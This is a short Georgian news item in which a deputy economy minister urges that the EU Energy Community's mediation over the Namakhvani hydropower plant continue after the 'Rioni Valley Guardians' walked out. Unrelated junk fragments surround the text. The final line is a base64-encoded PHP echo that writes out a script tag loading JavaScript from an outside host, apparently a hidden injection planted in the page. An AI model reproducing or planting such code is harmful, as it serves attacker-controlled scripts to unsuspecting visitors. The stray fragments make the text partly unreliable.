celsiusi
ავერსი შნაიდერი
ეკონომიკის მინისტრის მოადგილე დავით თვალაბეიშვილი ეხმაურება „რიონის ხეობის მცველების“ გადაწყვეტილებას, დატოვონ ევროკავშირის ენერგეტიკული გაერთიანების შუამავლობით დაწყებული მედიაციის პროცესი ნამახვანჰესის საკითხზე.
 
„ეკონომიკის სამინისტროს პოზიციაა, რომ „ნამახვანჰესთან“ დაკავშირებით, მედიაციის პროცესი აუცილებლად უნდა გაგრძელდეს და დასრულდეს ლოგიკური შედეგით“, – განაცხადა თვალაბეიშვილმა.
 
მინისტრის მოადგილის თქმით, მედიაცია „არ უნდა შეწყდეს მხოლოდ იმიტომ, რომ მასში მონაწილე რომელიმე მხარეს პროცესი არ მოსწონს ან მის დღის წესრიგს არ შეესაბამება“.
 
„რიონის ხეობის მცველებიმა“ 17 სექტემბერს განაცხადეს, რომ მედიატორი, – ენერგეტიკული გაერთიანების წარმომადგენელი დირკ ბუშლე, – იხრება საკითხის მხოლოდ ფორმალური გადაწყვეტისკენ:
 
თვალაბეიშვილის განცახდებით, სამინისტროს კვლავაც მიაჩია, რომ ევროკავშირის ენერგეტიკული გაერთიანების დავების გადაწყვეტისა და მოლაპარაკების ცენტრის მედიაცია ეფექტიანი ფორმატია მხარეების პოზიციების დაახლოებისათვის, საბოლოოდ კი „საქართველოსა და მისი ხალხის სასარგებლო გადაწყვეტილების მისაღებად“.
 
რიონის ხეობის მცველების“ მიერ მედიაციის პროცესის დატოვების შემდეგ,  არასამთავრობო ორგანიზაციები მედიაციაში მონაწილეობას აგრძელებენ.
1112
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");